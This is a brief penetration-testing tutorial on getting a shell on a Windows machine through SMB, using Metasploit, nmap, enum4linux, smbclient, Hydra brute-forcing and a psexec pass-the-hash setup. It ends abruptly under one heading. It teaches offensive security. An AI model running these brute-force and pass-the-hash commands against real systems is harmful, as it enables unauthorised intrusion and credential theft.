🎊Gaining Shell with SMB

Gaining Shell with SMB Shares: Metasploit and Manual Exploitation

This documentation provides a step-by-step guide on how to gain shell access using SMB shares, utilizing both Metasploit and manual exploitation techniques.

1. Introduction

Server Message Block (SMB): SMB is a network protocol used for file and printer sharing. Vulnerabilities in SMB implementations can be exploited to gain unauthorized access.

2. Prerequisites

  • Kali Linux: Used for carrying out penetration testing.

  • Metasploit: A penetration testing framework.

  • Target System: A Windows machine with open SMB shares.

3. Metasploit Exploitation

Using Metasploit to Exploit SMB

# Open Metasploit Console

# Search for SMB exploits
search smb

# Select a suitable exploit
use exploit/windows/smb/...

# Set required parameters
set RHOSTS <target_ip>

# Run the exploit

Manual Exploitation of SMB Shares

Manual exploitation of SMB (Server Message Block) shares involves identifying, interacting with, and exploiting open shares on a target system. This guide provides a detailed walkthrough of the manual exploitation process.

Table of Contents

  1. Identifying Open SMB Shares

    • Using tools like nmap and enum4linux to discover accessible shares.

  2. Interacting with SMB Shares

    • Utilizing tools like smbclient for basic interaction and enumeration.

  3. Brute-Force Attacks on SMB Shares

    • Employing tools like Hydra to perform brute-force attacks on weak passwords.

  4. Leveraging Vulnerabilities

    • Exploiting known vulnerabilities in SMB implementations.

1. Identifying Open SMB Shares

Using nmap to Identify Open SMB Ports

nmap -p 139,445 --script smb-enum-shares <target_ip>

Using enum4linux for Enumeration

enum4linux -a <target_ip>

2. Interacting with SMB Shares

Basic Interaction with smbclient

smbclient //<target_ip>/share_name -U username

Enumerating Shares

smbclient -L //<target_ip> -U username

3. Brute-Force Attacks on SMB Shares

Using Hydra for Brute-Force

hydra -l username -P /path/to/password_list smb://<target_ip>

4. Metasploit Exploitation and Hash Exploitation

Setting Hash for Administrator

use exploit/windows/smb/psexec
set RHOSTS <target_ip>
set SMBPass <hash_of_admin>
set SMBUser Administrator

Unsetting Subdomain for Hash Pass


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